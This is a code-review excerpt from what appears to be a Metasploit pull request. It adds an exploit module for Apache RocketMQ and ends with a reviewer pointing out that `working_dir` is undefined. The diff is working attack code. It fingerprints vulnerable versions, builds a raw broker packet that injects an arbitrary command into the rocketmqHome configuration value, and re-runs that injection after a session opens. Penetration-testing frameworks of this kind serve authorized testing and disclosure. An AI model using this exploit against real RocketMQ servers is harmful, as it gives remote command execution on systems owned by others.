modules/exploits/multi/http/apache_rocketmq_update_config.rb

```diff
@@ -0,0 +1,129 @@
+          ],
+        ],
+        'Payload' => {
+          'BadChars' => "\x27"
+        },
+        'DefaultOptions' => {
+          'WfsDelay' => 60
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-05-23',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The RocketMQ NameServer port', 9876]),
+        OptPort.new('BROKER_PORT', [false, 'The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommended)', 10911])
+      ]
+    )
+  end
+
+  def check
+    @version_request_response = send_version_request
+    @parsed_data = parse_rocketmq_data(@version_request_response)
+    return Exploit::CheckCode::Unknown('RocketMQ did not respond to the request for version information') unless @parsed_data['version']
+
+    version = Rex::Version.new(@parsed_data['version'].gsub('V', ''))
+    return Exploit::CheckCode::Unknown('Unable to determine the version') unless version
+
+    if version > Rex::Version.new('5.0.0')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}") if version <= Rex::Version.new('5.1.0')
+    elsif version <= Rex::Version.new('4.9.5')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}")
+    end
+    Exploit::CheckCode::Safe("RocketMQ version: #{version}")
+  end
+
+  def execute_command(cmd, opts = {})
+    data = '`{"code":25,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":395}filterServerNums=1
+rocketmqHome=' + cmd.encode('UTF-8') + "\x3b\x0a"
+    header = [data.length + 3].pack('N') + "\x00\x00\x00"
+    payload = header + data
+
+    begin
+      vprint_status("Payload command to be executed: #{cmd}")
+      sock = connect(true, { 'RHOST' => datastore['RHOST'], 'RPORT' => opts[:broker_port].to_i })
+      vprint_status("Payload is #{data}")
+      sock.put(payload)
+    rescue Rex::ConnectionError, ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e
+      fail_with(Failure::Unreachable, "Unable to connect: #{e.class} #{e.message}")
+    end
+  end
+
+  def on_new_session(session)
+    print_status('Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted')
+
+    if session.type == 'meterpreter'
+      pwd = session.fs.dir.pwd
+    else
+      pwd = session.shell_command_token('pwd')
+    end
+
+    # The session returned by the exploit spawns inside $ROCKETMQ_HOME/bin
+    pwd.gsub!('/bin', '')
+    print_good("Determined the original $ROCKETMQ_HOME: #{pwd}")
+    print_status('Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value')
+
+    execute_command(working_dir, { broker_port: @broker_port })
```

Comment:
I could not find where `working_dir` is defined. This causes a `NameError` exception.